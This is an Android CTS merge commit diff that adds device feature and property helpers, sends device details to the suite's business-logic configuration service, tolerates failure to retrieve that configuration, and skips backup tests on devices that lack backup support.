Merge "Merge "CTS: Wait for InstrumentationTestActivity to start" into oreo-cts-dev am: 6b41d72d57" am: 2ecb67fb9e
am: 5913c58d56
Change-Id: Ic7e75c8a9b651744c728528cf2370b64637b9177
diff --git a/common/device-side/util/src/com/android/compatibility/common/util/BusinessLogicTestCase.java b/common/device-side/util/src/com/android/compatibility/common/util/BusinessLogicTestCase.java
index bcd4fc0..2316637 100644
--- a/common/device-side/util/src/com/android/compatibility/common/util/BusinessLogicTestCase.java
+++ b/common/device-side/util/src/com/android/compatibility/common/util/BusinessLogicTestCase.java
@@ -15,6 +15,7 @@
*/
package com.android.compatibility.common.util;
+import static org.junit.Assert.assertTrue;
import static org.junit.Assert.fail;
import static org.junit.Assume.assumeTrue;
@@ -45,16 +46,23 @@
@Rule public TestName mTestCase = new TestName();
private static BusinessLogic mBusinessLogic;
+ private static boolean mCanReadBusinessLogic = true;
@BeforeClass
public static void prepareBusinessLogic() {
File businessLogicFile = new File(BusinessLogic.DEVICE_FILE);
- mBusinessLogic = BusinessLogicFactory.createFromFile(businessLogicFile);
+ if (businessLogicFile.canRead()) {
+ mBusinessLogic = BusinessLogicFactory.createFromFile(businessLogicFile);
+ } else {
+ mCanReadBusinessLogic = false;
+ }
}
@Before
public void executeBusinessLogic() {
String methodName = mTestCase.getMethodName();
+ assertTrue(String.format("Test \"%s\" is unable to execute as it depends on the missing "
+ + "remote configuration.", methodName), mCanReadBusinessLogic);
if (methodName.contains(PARAM_START)) {
// Strip parameter suffix (e.g. "[0]") from method name
methodName = methodName.substring(0, methodName.lastIndexOf(PARAM_START));
diff --git a/common/device-side/util/src/com/android/compatibility/common/util/DeviceInfoStore.java b/common/device-side/util/src/com/android/compatibility/common/util/DeviceInfoStore.java
index 735b955..966ac1a 100644
--- a/common/device-side/util/src/com/android/compatibility/common/util/DeviceInfoStore.java
+++ b/common/device-side/util/src/com/android/compatibility/common/util/DeviceInfoStore.java
@@ -56,6 +56,7 @@
@Override
public void close() throws IOException {
mJsonWriter.endObject();
+ mJsonWriter.flush();
mJsonWriter.close();
}
diff --git a/common/device-side/util/src/com/android/compatibility/common/util/FeatureUtil.java b/common/device-side/util/src/com/android/compatibility/common/util/FeatureUtil.java
index 1e870a1..5be72b8 100644
--- a/common/device-side/util/src/com/android/compatibility/common/util/FeatureUtil.java
+++ b/common/device-side/util/src/com/android/compatibility/common/util/FeatureUtil.java
@@ -16,15 +16,21 @@
package com.android.compatibility.common.util;
+import android.content.pm.FeatureInfo;
import android.content.pm.PackageManager;
+import android.os.Build;
import android.support.test.InstrumentationRegistry;
+import java.util.HashSet;
+import java.util.Set;
+
/**
* Device-side utility class for detecting system features
*/
public class FeatureUtil {
public static final String LEANBACK_FEATURE = "android.software.leanback";
+ public static final String LOW_RAM_FEATURE = "android.hardware.ram.low";
public static final String TV_FEATURE = "android.hardware.type.television";
public static final String WATCH_FEATURE = "android.hardware.type.watch";
@@ -56,6 +62,15 @@
return true;
}
+ /** Returns all system features of the device */
+ public static Set<String> getAllFeatures() {
+ Set<String> allFeatures = new HashSet<String>();
+ for (FeatureInfo fi : getPackageManager().getSystemAvailableFeatures()) {
+ allFeatures.add(fi.name);
+ }
+ return allFeatures;
+ }
+
/** Returns true if the device has feature TV_FEATURE or feature LEANBACK_FEATURE */
public static boolean isTV() {
return hasAnySystemFeature(TV_FEATURE, LEANBACK_FEATURE);
@@ -66,6 +81,15 @@
return hasSystemFeature(WATCH_FEATURE);
}
+ /** Returns true if the device is a low ram device:
+ * 1. API level >= O
+ * 2. device has feature LOW_RAM_FEATURE
+ */
+ public static boolean isLowRam() {
+ return ApiLevelUtil.isAtLeast(Build.VERSION_CODES.O) &&
+ hasSystemFeature(LOW_RAM_FEATURE);
+ }
+
private static PackageManager getPackageManager() {
return InstrumentationRegistry.getInstrumentation().getTargetContext().getPackageManager();
}
diff --git a/common/device-side/util/src/com/android/compatibility/common/util/PropertyUtil.java b/common/device-side/util/src/com/android/compatibility/common/util/PropertyUtil.java
index 0d66b13..0424f69 100644
--- a/common/device-side/util/src/com/android/compatibility/common/util/PropertyUtil.java
+++ b/common/device-side/util/src/com/android/compatibility/common/util/PropertyUtil.java
@@ -16,10 +16,17 @@
package com.android.compatibility.common.util;
+import com.android.compatibility.common.util.SystemUtil;
+
import android.os.Build;
+import android.support.test.InstrumentationRegistry;
import java.io.IOException;
+import java.util.HashMap;
+import java.util.Map;
import java.util.Scanner;
+import java.util.regex.Matcher;
+import java.util.regex.Pattern;
/**
* Device-side utility class for reading properties and gathering information for testing
@@ -32,11 +39,21 @@
* shipped. Property should be undefined for factory ROM products.
*/
public static final String FIRST_API_LEVEL = "ro.product.first_api_level";
+ private static final String BUILD_TYPE_PROPERTY = "ro.build.type";
+ private static final String MANUFACTURER_PROPERTY = "ro.product.manufacturer";
private static final String TAG_DEV_KEYS = "dev-keys";
+ public static final String GOOGLE_SETTINGS_QUERY =
+ "content query --uri content://com.google.settings/partner";
+
/** Value to be returned by getPropertyInt() if property is not found */
public static int INT_VALUE_IF_UNSET = -1;
+ /** Returns whether the device build is a user build */
+ public static boolean isUserBuild() {
+ return propertyEquals(BUILD_TYPE_PROPERTY, "user");
+ }
+
/** Returns whether the device build is the factory ROM */
public static boolean isFactoryROM() {
// property should be undefined if and only if the product is factory ROM.
@@ -63,6 +80,33 @@
return (firstApiLevel == INT_VALUE_IF_UNSET) ? Build.VERSION.SDK_INT : firstApiLevel;
}
+ /**
+ * Return the manufacturer of this product. If unset, return null.
+ */
+ public static String getManufacturer() {
+ return getProperty(MANUFACTURER_PROPERTY);
+ }
+
+ /** Returns a mapping from client ID names to client ID values */
+ public static Map<String, String> getClientIds() throws IOException {
+ Map<String,String> clientIds = new HashMap<>();
+ String queryOutput = SystemUtil.runShellCommand(
+ InstrumentationRegistry.getInstrumentation(), GOOGLE_SETTINGS_QUERY);
+ for (String line : queryOutput.split("[\\r?\\n]+")) {
+ // Expected line format: "Row: 1 _id=123, name=<property_name>, value=<property_value>"
+ Pattern pattern = Pattern.compile("name=([a-z_]*), value=(.*)$");
+ Matcher matcher = pattern.matcher(line);
+ if (matcher.find()) {
+ String name = matcher.group(1);
+ String value = matcher.group(2);
+ if (name.contains("client_id")) {
+ clientIds.put(name, value); // only add name-value pair for client ids
+ }
+ }
+ }
+ return clientIds;
+ }
+
/** Returns whether the property exists on this device */
public static boolean propertyExists(String property) {
return getProperty(property) != null;
diff --git a/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/build/CompatibilityBuildHelper.java b/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/build/CompatibilityBuildHelper.java
index 2e3a6dd..50d1c3a 100644
--- a/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/build/CompatibilityBuildHelper.java
+++ b/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/build/CompatibilityBuildHelper.java
@@ -140,8 +140,20 @@
return configMap;
}
+ /**
+ * @return whether the business logic file has been set for this invocation.
+ */
+ public boolean hasBusinessLogicHostFile() {
+ return mBuildInfo.getBuildAttributes().get(BUSINESS_LOGIC_HOST_FILE) != null;
+ }
+
+ /**
+ * @return a {@link File} representing the file containing business logic data for this
+ * invocation, or null if the business logic file has not been set.
+ */
public File getBusinessLogicHostFile() {
- return new File(mBuildInfo.getBuildAttributes().get(BUSINESS_LOGIC_HOST_FILE));
+ return (hasBusinessLogicHostFile()) ?
+ new File(mBuildInfo.getBuildAttributes().get(BUSINESS_LOGIC_HOST_FILE)) : null;
}
/**
diff --git a/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/targetprep/BusinessLogicPreparer.java b/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/targetprep/BusinessLogicPreparer.java
index aa23eb5..cd4f701 100644
--- a/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/targetprep/BusinessLogicPreparer.java
+++ b/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/targetprep/BusinessLogicPreparer.java
@@ -16,22 +16,35 @@
package com.android.compatibility.common.tradefed.targetprep;
import com.android.compatibility.common.tradefed.build.CompatibilityBuildHelper;
+import com.android.compatibility.common.tradefed.util.DynamicConfigFileReader;
import com.android.compatibility.common.util.BusinessLogic;
+import com.android.compatibility.common.util.FeatureUtil;
+import com.android.compatibility.common.util.PropertyUtil;
import com.android.tradefed.build.IBuildInfo;
import com.android.tradefed.config.Option;
import com.android.tradefed.config.OptionClass;
import com.android.tradefed.device.DeviceNotAvailableException;
import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.log.LogUtil.CLog;
import com.android.tradefed.targetprep.BuildError;
import com.android.tradefed.targetprep.ITargetCleaner;
import com.android.tradefed.targetprep.TargetSetupError;
import com.android.tradefed.testtype.suite.TestSuiteInfo;
import com.android.tradefed.util.FileUtil;
+import com.android.tradefed.util.MultiMap;
import com.android.tradefed.util.StreamUtil;
+import com.android.tradefed.util.net.HttpHelper;
+import com.android.tradefed.util.net.IHttpHelper;
+
+import org.xmlpull.v1.XmlPullParserException;
import java.io.File;
import java.io.IOException;
import java.net.URL;
+import java.util.ArrayList;
+import java.util.List;
+import java.util.Map;
+import java.util.Set;
/**
* Pushes business Logic to the host and the test device, for use by test cases in the test suite.
@@ -47,6 +60,10 @@
/* Extension of business logic files */
private static final String FILE_EXT = ".bl";
+ /* Dynamic config constants */
+ private static final String DYNAMIC_CONFIG_FEATURES_KEY = "business_logic_device_features";
+ private static final String DYNAMIC_CONFIG_PROPERTIES_KEY = "business_logic_device_properties";
+
@Option(name = "business-logic-url", description = "The URL to use when accessing the " +
"business logic service, parameters not included", mandatory = true)
private String mUrl;
@@ -59,6 +76,10 @@
"target after test completion.")
private boolean mCleanup = true;
+ @Option(name = "ignore-business-logic-failure", description = "Whether to proceed with the " +
+ "suite invocation if retrieval of business logic fails.")
+ private boolean mIgnoreFailure = false;
+
private String mDeviceFilePushed;
private String mHostFilePushed;
@@ -68,18 +89,25 @@
@Override
public void setUp(ITestDevice device, IBuildInfo buildInfo) throws TargetSetupError, BuildError,
DeviceNotAvailableException {
- // Piece together request URL
- String requestString = String.format("%s?key=%s", mUrl.replace(SUITE_PLACEHOLDER,
- TestSuiteInfo.getInstance().getName()), mApiKey);
+ String requestString = buildRequestString(device, buildInfo);
// Retrieve business logic string from service
String businessLogicString = null;
try {
URL request = new URL(requestString);
businessLogicString = StreamUtil.getStringFromStream(request.openStream());
} catch (IOException e) {
- throw new TargetSetupError(String.format(
- "Cannot connect to business logic service for suite %s",
- TestSuiteInfo.getInstance().getName()), e, device.getDeviceDescriptor());
+ if (mIgnoreFailure) {
+ CLog.e("Failed to connect to business logic service.\nProceeding with test"
+ + "invocation, tests depending on the remote configuration will fail.\n");
+ return;
+ } else {
+ throw new TargetSetupError(String.format(
+ "Cannot connect to business logic service for suite %s.\nIf this problem "
+ + "persists, re-invoking with option '--ignore-business-logic-failure' will "
+ + "cause tests to execute anyways (though tests depending on the remote "
+ + "configuration will fail).", TestSuiteInfo.getInstance().getName()), e,
+ device.getDeviceDescriptor());
+ }
}
// Push business logic string to host file
try {
@@ -100,10 +128,73 @@
} else {
throw new TargetSetupError(String.format(
"Retrieved business logic for suite %s could not be written to device %s",
- TestSuiteInfo.getInstance().getName(), device.getSerialNumber()), device.getDeviceDescriptor());
+ TestSuiteInfo.getInstance().getName(), device.getSerialNumber()),
+ device.getDeviceDescriptor());
}
}
+ /** Helper to populate the business logic service request with info about the device. */
+ private String buildRequestString(ITestDevice device, IBuildInfo buildInfo)
+ throws DeviceNotAvailableException {
+ CompatibilityBuildHelper buildHelper = new CompatibilityBuildHelper(buildInfo);
+ String baseUrl = mUrl.replace(SUITE_PLACEHOLDER, getSuiteName());
+ MultiMap<String, String> paramMap = new MultiMap<>();
+ paramMap.put("key", mApiKey);
+ paramMap.put("suite_version", buildHelper.getSuiteVersion());
+ paramMap.put("oem", PropertyUtil.getManufacturer(device));
+ for (String feature : getBusinessLogicFeatures(device, buildInfo)) {
+ paramMap.put("features", feature);
+ }
+ for (String property : getBusinessLogicProperties(device, buildInfo)) {
+ paramMap.put("properties", property);
+ }
+ IHttpHelper helper = new HttpHelper();
+ return helper.buildUrl(baseUrl, paramMap);
+ }
+
+ /* Get device properties list, with element format "<property_name>:<property_value>" */
+ private List<String> getBusinessLogicProperties(ITestDevice device, IBuildInfo buildInfo)
+ throws DeviceNotAvailableException {
+ List<String> properties = new ArrayList<>();
+ Map<String, String> clientIds = PropertyUtil.getClientIds(device);
+ for (Map.Entry<String, String> id : clientIds.entrySet()) {
+ // add client IDs to the list of properties
+ properties.add(String.format("%s:%s", id.getKey(), id.getValue()));
+ }
+
+ try {
+ List<String> propertyNames = DynamicConfigFileReader.getValuesFromConfig(buildInfo,
+ getSuiteName(), DYNAMIC_CONFIG_PROPERTIES_KEY);
+ for (String name : propertyNames) {
+ // Use String.valueOf in case property is undefined for the device ("null")
+ String value = String.valueOf(device.getProperty(name));
+ properties.add(String.format("%s:%s", name, value));
+ }
+ } catch (XmlPullParserException | IOException e) {
+ CLog.e("Failed to pull business logic properties from dynamic config");
+ }
+ return properties;
+ }
+
+ /* Get device features list */
+ private List<String> getBusinessLogicFeatures(ITestDevice device, IBuildInfo buildInfo)
+ throws DeviceNotAvailableException {
+ try {
+ List<String> dynamicConfigFeatures = DynamicConfigFileReader.getValuesFromConfig(
+ buildInfo, getSuiteName(), DYNAMIC_CONFIG_FEATURES_KEY);
+ Set<String> deviceFeatures = FeatureUtil.getAllFeatures(device);
+ dynamicConfigFeatures.retainAll(deviceFeatures);
+ return dynamicConfigFeatures;
+ } catch (XmlPullParserException | IOException e) {
+ CLog.e("Failed to pull business logic features from dynamic config");
+ return new ArrayList<>();
+ }
+ }
+
+ private String getSuiteName() {
+ return TestSuiteInfo.getInstance().getName().toLowerCase();
+ }
+
/**
* {@inheritDoc}
*/
diff --git a/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/testtype/BusinessLogicHostTestBase.java b/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/testtype/BusinessLogicHostTestBase.java
index 6bd0fc2..7ebd717 100644
--- a/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/testtype/BusinessLogicHostTestBase.java
+++ b/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/testtype/BusinessLogicHostTestBase.java
@@ -15,6 +15,7 @@
*/
package com.android.compatibility.common.tradefed.testtype;
+import static org.junit.Assert.assertTrue;
import static org.junit.Assert.fail;
import static org.junit.Assume.assumeTrue;
@@ -43,6 +44,7 @@
@Rule public TestName mTestCase = new TestName();
private static BusinessLogic mBusinessLogic;
+ private static boolean mCanReadBusinessLogic = true;
@Before
public void executeBusinessLogic() {
@@ -51,10 +53,16 @@
if (mBusinessLogic == null) {
CompatibilityBuildHelper helper = new CompatibilityBuildHelper(mBuild);
File businessLogicFile = helper.getBusinessLogicHostFile();
- mBusinessLogic = BusinessLogicFactory.createFromFile(businessLogicFile);
+ if (businessLogicFile != null && businessLogicFile.canRead()) {
+ mBusinessLogic = BusinessLogicFactory.createFromFile(businessLogicFile);
+ } else {
+ mCanReadBusinessLogic = false; // failed to retrieve business logic
+ }
}
String methodName = mTestCase.getMethodName();
+ assertTrue(String.format("Test \"%s\" is unable to execute as it depends on the missing "
+ + "remote configuration.", methodName), mCanReadBusinessLogic);
if (methodName.contains(PARAM_START)) {
// Strip parameter suffix (e.g. "[0]") from method name
methodName = methodName.substring(0, methodName.lastIndexOf(PARAM_START));
diff --git a/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/util/DynamicConfigFileReader.java b/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/util/DynamicConfigFileReader.java
index edde90f..f2b7f3c 100644
--- a/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/util/DynamicConfigFileReader.java
+++ b/common/host-side/tradefed/src/com/android/compatibility/common/tradefed/util/DynamicConfigFileReader.java
@@ -52,6 +52,19 @@
}
/**
+ * Returns the multiple values of a key from a downloaded file.
+ *
+ * @param file The file downloaded, can be retrieve via
+ * {@link CompatibilityBuildHelper#getDynamicConfigFiles()}
+ * @param key the key inside the file which values we want to return
+ * @return the values associated to the key in the config file provided.
+ */
+ public static List<String> getValuesFromConfig(File file, String key)
+ throws XmlPullParserException, IOException {
+ return DynamicConfig.createConfigMap(file).get(key);
+ }
+
+ /**
* Returns the value of a key from the build info and module targeted.
*
* @param info the {@link IBuildInfo} of the run.
@@ -64,9 +77,28 @@
CompatibilityBuildHelper helper = new CompatibilityBuildHelper(info);
File dynamicConfig = helper.getDynamicConfigFiles().get(moduleName);
if (dynamicConfig == null) {
- CLog.d("Config file %s, not found in the map of dynamic configs.", moduleName);
+ CLog.w("Config file %s, not found in the map of dynamic configs.", moduleName);
return null;
}
return getValueFromConfig(dynamicConfig, key);
}
+
+ /**
+ * Returns the multiple values of a key from the build info and module targeted.
+ *
+ * @param info the {@link IBuildInfo} of the run.
+ * @param moduleName the name of the module we need the dynamic file from.
+ * @param key the key inside the file which values we want to return
+ * @return the values associated to the key in the dynamic config associated with the module.
+ */
+ public static List<String> getValuesFromConfig(IBuildInfo info, String moduleName, String key)
+ throws XmlPullParserException, IOException {
+ CompatibilityBuildHelper helper = new CompatibilityBuildHelper(info);
+ File dynamicConfig = helper.getDynamicConfigFiles().get(moduleName);
+ if (dynamicConfig == null) {
+ CLog.w("Config file %s, not found in the map of dynamic configs.", moduleName);
+ return null;
+ }
+ return getValuesFromConfig(dynamicConfig, key);
+ }
}
diff --git a/common/host-side/util/src/com/android/compatibility/common/util/FeatureUtil.java b/common/host-side/util/src/com/android/compatibility/common/util/FeatureUtil.java
index 11eecfd..a51df79 100644
--- a/common/host-side/util/src/com/android/compatibility/common/util/FeatureUtil.java
+++ b/common/host-side/util/src/com/android/compatibility/common/util/FeatureUtil.java
@@ -19,12 +19,16 @@
import com.android.tradefed.device.DeviceNotAvailableException;
import com.android.tradefed.device.ITestDevice;
+import java.util.HashSet;
+import java.util.Set;
+
/**
* Host-side utility class for detecting system features
*/
public class FeatureUtil {
public static final String LEANBACK_FEATURE = "android.software.leanback";
+ public static final String LOW_RAM_FEATURE = "android.hardware.ram.low";
public static final String TV_FEATURE = "android.hardware.type.television";
public static final String WATCH_FEATURE = "android.hardware.type.watch";
@@ -56,6 +60,17 @@
return true;
}
+ /** Returns all system features of the device */
+ public static Set<String> getAllFeatures(ITestDevice device)
+ throws DeviceNotAvailableException {
+ Set<String> allFeatures = new HashSet<String>();
+ String output = device.executeShellCommand("pm list features");
+ for (String feature : output.split("[\\r?\\n]+")) {
+ allFeatures.add(feature.substring("feature:".length()));
+ }
+ return allFeatures;
+ }
+
/** Returns true if the device has feature TV_FEATURE or feature LEANBACK_FEATURE */
public static boolean isTV(ITestDevice device) throws DeviceNotAvailableException {
return hasAnySystemFeature(device, TV_FEATURE, LEANBACK_FEATURE);
@@ -66,5 +81,12 @@
return hasSystemFeature(device, WATCH_FEATURE);
}
-
+ /** Returns true if the device is a low ram device:
+ * 1. API level >= O
+ * 2. device has feature LOW_RAM_FEATURE
+ */
+ public static boolean isLowRam(ITestDevice device) throws DeviceNotAvailableException {
+ return ApiLevelUtil.isAtLeast(device, VersionCodes.O) &&
+ hasSystemFeature(device, LOW_RAM_FEATURE);
+ }
}
diff --git a/common/host-side/util/src/com/android/compatibility/common/util/HostInfoStore.java b/common/host-side/util/src/com/android/compatibility/common/util/HostInfoStore.java
index 3b7f6c8..1fa149f 100644
--- a/common/host-side/util/src/com/android/compatibility/common/util/HostInfoStore.java
+++ b/common/host-side/util/src/com/android/compatibility/common/util/HostInfoStore.java
@@ -55,6 +55,7 @@
@Override
public void close() throws IOException {
mJsonWriter.endObject();
+ mJsonWriter.flush();
mJsonWriter.close();
}
diff --git a/common/host-side/util/src/com/android/compatibility/common/util/PropertyUtil.java b/common/host-side/util/src/com/android/compatibility/common/util/PropertyUtil.java
index b047ed3..08d852f 100644
--- a/common/host-side/util/src/com/android/compatibility/common/util/PropertyUtil.java
+++ b/common/host-side/util/src/com/android/compatibility/common/util/PropertyUtil.java
@@ -18,6 +18,11 @@
import com.android.tradefed.device.DeviceNotAvailableException;
import com.android.tradefed.device.ITestDevice;
+import java.util.HashMap;
+import java.util.Map;
+import java.util.regex.Matcher;
+import java.util.regex.Pattern;
+
/**
* Host-side utility class for reading properties and gathering information for testing
* Android device compatibility.
@@ -30,8 +35,18 @@
*/
public static final String FIRST_API_LEVEL = "ro.product.first_api_level";
private static final String BUILD_TAGS_PROPERTY = "ro.build.tags";
+ private static final String BUILD_TYPE_PROPERTY = "ro.build.type";
+ private static final String MANUFACTURER_PROPERTY = "ro.product.manufacturer";
private static final String TAG_DEV_KEYS = "dev-keys";
+ public static final String GOOGLE_SETTINGS_QUERY =
+ "content query --uri content://com.google.settings/partner";
+
+ /** Returns whether the device build is a user build */
+ public static boolean isUserBuild(ITestDevice device) throws DeviceNotAvailableException {
+ return propertyEquals(device, BUILD_TYPE_PROPERTY, "user");
+ }
+
/** Returns whether the device build is the factory ROM */
public static boolean isFactoryROM(ITestDevice device) throws DeviceNotAvailableException {
// first API level property should be undefined if and only if the product is factory ROM.
@@ -59,6 +74,33 @@
return (propString == null) ? device.getApiLevel() : Integer.parseInt(propString);
}
+ /**
+ * Return the manufacturer of this product. If unset, return null.
+ */
+ public static String getManufacturer(ITestDevice device) throws DeviceNotAvailableException {
+ return device.getProperty(MANUFACTURER_PROPERTY);
+ }
+
+ /** Returns a mapping from client ID names to client ID values */
+ public static Map<String, String> getClientIds(ITestDevice device)
+ throws DeviceNotAvailableException {
+ Map<String,String> clientIds = new HashMap<>();
+ String queryOutput = device.executeShellCommand(GOOGLE_SETTINGS_QUERY);
+ for (String line : queryOutput.split("[\\r?\\n]+")) {
+ // Expected line format: "Row: 1 _id=123, name=<property_name>, value=<property_value>"
+ Pattern pattern = Pattern.compile("name=([a-z_]*), value=(.*)$");
+ Matcher matcher = pattern.matcher(line);
+ if (matcher.find()) {
+ String name = matcher.group(1);
+ String value = matcher.group(2);
+ if (name.contains("client_id")) {
+ clientIds.put(name, value); // only add name-value pair for client ids
+ }
+ }
+ }
+ return clientIds;
+ }
+
/** Returns whether the property exists on this device */
public static boolean propertyExists(ITestDevice device, String property)
throws DeviceNotAvailableException {
diff --git a/hostsidetests/backup/src/android/cts/backup/AllowBackupHostSideTest.java b/hostsidetests/backup/src/android/cts/backup/AllowBackupHostSideTest.java
index 043c982..4f46936 100644
--- a/hostsidetests/backup/src/android/cts/backup/AllowBackupHostSideTest.java
+++ b/hostsidetests/backup/src/android/cts/backup/AllowBackupHostSideTest.java
@@ -18,8 +18,9 @@
import static junit.framework.Assert.assertNull;
-import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
import com.android.tradefed.device.DeviceNotAvailableException;
+import com.android.tradefed.log.LogUtil.CLog;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
import org.junit.After;
import org.junit.Test;
@@ -64,6 +65,10 @@
public void tearDown() throws Exception {
super.tearDown();
+ if (!mIsBackupSupported) {
+ return;
+ }
+
// Clear backup data and uninstall the package (in that order!)
clearBackupDataInLocalTransport(ALLOWBACKUP_APP_NAME);
assertNull(uninstallPackage(ALLOWBACKUP_APP_NAME));
@@ -71,6 +76,11 @@
@Test
public void testAllowBackup_False() throws Exception {
+ if (!mIsBackupSupported) {
+ CLog.i("android.software.backup feature is not supported on this device");
+ return;
+ }
+
installPackage(ALLOWBACKUP_FALSE_APP_APK, "-d", "-r");
// Generate the files that are going to be backed up.
@@ -90,6 +100,11 @@
@Test
public void testAllowBackup_True() throws Exception {
+ if (!mIsBackupSupported) {
+ CLog.i("android.software.backup feature is not supported on this device");
+ return;
+ }
+
installPackage(ALLOWBACKUP_APP_APK, "-d", "-r");
// Generate the files that are going to be backed up.
diff --git a/hostsidetests/backup/src/android/cts/backup/FullBackupOnlyHostSideTest.java b/hostsidetests/backup/src/android/cts/backup/FullBackupOnlyHostSideTest.java
index 7697dd2..89cfe40 100644
--- a/hostsidetests/backup/src/android/cts/backup/FullBackupOnlyHostSideTest.java
+++ b/hostsidetests/backup/src/android/cts/backup/FullBackupOnlyHostSideTest.java
@@ -19,6 +19,7 @@
import static junit.framework.Assert.assertNull;
import com.android.tradefed.device.DeviceNotAvailableException;
+import com.android.tradefed.log.LogUtil.CLog;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
import org.junit.After;
@@ -78,6 +79,10 @@
public void tearDown() throws Exception {
super.tearDown();
+ if (!mIsBackupSupported) {
+ return;
+ }
+
// Clear backup data and uninstall the package (in that order!)
clearBackupDataInLocalTransport(FULLBACKUPONLY_APP_PACKAGE);
assertNull(uninstallPackage(FULLBACKUPONLY_APP_PACKAGE));
@@ -90,6 +95,11 @@
*/
@Test
public void testFullBackupOnlyFalse_WithAgent() throws Exception {
+ if (!mIsBackupSupported) {
+ CLog.i("android.software.backup feature is not supported on this device");
+ return;
+ }
+
installPackage(FULLBACKUPONLY_FALSE_WITH_AGENT_APP_APK, "-d", "-r");
checkFullBackupOnlyDeviceTest("createFiles");
@@ -111,6 +121,11 @@
*/
@Test
public void testFullBackupOnlyFalse_NoAgent() throws Exception {
+ if (!mIsBackupSupported) {
+ CLog.i("android.software.backup feature is not supported on this device");
+ return;
+ }
+
installPackage(FULLBACKUPONLY_FALSE_NO_AGENT_APP_APK, "-d", "-r");
checkFullBackupOnlyDeviceTest("createFiles");
@@ -132,6 +147,11 @@
*/
@Test
public void testFullBackupOnlyTrue_WithAgent() throws Exception {
+ if (!mIsBackupSupported) {
+ CLog.i("android.software.backup feature is not supported on this device");
+ return;
+ }
+
installPackage(FULLBACKUPONLY_TRUE_WITH_AGENT_APP_APK, "-d", "-r");
checkFullBackupOnlyDeviceTest("createFiles");
diff --git a/hostsidetests/backup/src/android/cts/backup/FullbackupRulesHostSideTest.java b/hostsidetests/backup/src/android/cts/backup/FullbackupRulesHostSideTest.java
index 79ec24c..8dd589a 100644
--- a/hostsidetests/backup/src/android/cts/backup/FullbackupRulesHostSideTest.java
+++ b/hostsidetests/backup/src/android/cts/backup/FullbackupRulesHostSideTest.java
@@ -18,6 +18,7 @@
import static org.junit.Assert.assertTrue;
+import com.android.tradefed.log.LogUtil.CLog;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
import org.junit.Test;
@@ -45,6 +46,11 @@
@Test
public void testNoBackupFolder() throws Exception {
+ if (!mIsBackupSupported) {
+ CLog.i("android.software.backup feature is not supported on this device");
+ return;
+ }
+
// Generate the files that are going to be backed up.
checkDeviceTest(FULLBACKUP_TESTS_APP_NAME, FULLBACKUP_DEVICE_TEST_CLASS_NAME,
"createFiles");
@@ -70,6 +76,11 @@
@Test
public void testIncludeExcludeRules() throws Exception {
+ if (!mIsBackupSupported) {
+ CLog.i("android.software.backup feature is not supported on this device");
+ return;
+ }
+
// Generate the files that are going to be backed up.
checkDeviceTest(INCLUDE_EXCLUDE_TESTS_APP_NAME, INCLUDE_EXCLUDE_DEVICE_TEST_CLASS_NAME,
"createFiles");
diff --git a/hostsidetests/backup/src/android/cts/backup/KeyValueBackupRestoreHostSideTest.java b/hostsidetests/backup/src/android/cts/backup/KeyValueBackupRestoreHostSideTest.java
index 70bfc07..a1f4927 100644
--- a/hostsidetests/backup/src/android/cts/backup/KeyValueBackupRestoreHostSideTest.java
+++ b/hostsidetests/backup/src/android/cts/backup/KeyValueBackupRestoreHostSideTest.java
@@ -138,6 +138,11 @@
*/
@Test
public void testSharedPreferencesRestore() throws Exception {
+ if (!mIsBackupSupported) {
+ CLog.i("android.software.backup feature is not supported on this device");
+ return;
+ }
+
checkDeviceTest("launchSharedPrefActivity");
backupNowAndAssertSuccess(SHARED_PREFERENCES_RESTORE_APP_PACKAGE);
diff --git a/hostsidetests/backup/src/android/cts/backup/RestoreAnyVersionHostSideTest.java b/hostsidetests/backup/src/android/cts/backup/RestoreAnyVersionHostSideTest.java
index 4099169..7c1f37b 100644
--- a/hostsidetests/backup/src/android/cts/backup/RestoreAnyVersionHostSideTest.java
+++ b/hostsidetests/backup/src/android/cts/backup/RestoreAnyVersionHostSideTest.java
@@ -22,8 +22,9 @@
import static org.junit.Assume.assumeTrue;
-import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
import com.android.tradefed.device.DeviceNotAvailableException;
+import com.android.tradefed.log.LogUtil.CLog;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
import org.junit.After;
import org.junit.Before;
@@ -64,6 +65,10 @@
public void tearDown() throws Exception {
super.tearDown();
+ if (!mIsBackupSupported) {
+ return;
+ }
+
// Clear backup data and uninstall the package (in that order!)
clearBackupDataInLocalTransport(RESTORE_ANY_VERSION_APP_PACKAGE);
assertNull(uninstallPackage(RESTORE_ANY_VERSION_APP_PACKAGE));
@@ -75,6 +80,11 @@
*/
@Test
public void testRestoreAnyVersion_False() throws Exception {
+ if (!mIsBackupSupported) {
+ CLog.i("android.software.backup feature is not supported on this device");
+ return;
+ }
+
installNewVersionApp();
saveSharedPreferenceValue();
@@ -96,6 +106,11 @@
*/
@Test
public void testRestoreAnyVersion_True() throws Exception {
+ if (!mIsBackupSupported) {
+ CLog.i("android.software.backup feature is not supported on this device");
+ return;
+ }
+
installNewVersionApp();
saveSharedPreferenceValue();
@@ -117,6 +132,11 @@
*/
@Test
public void testRestoreAnyVersion_OldBackupToNewApp() throws Exception {
+ if (!mIsBackupSupported) {
+ CLog.i("android.software.backup feature is not supported on this device");
+ return;
+ }
+
installNoRestoreAnyVersionApp();
saveSharedPreferenceValue();
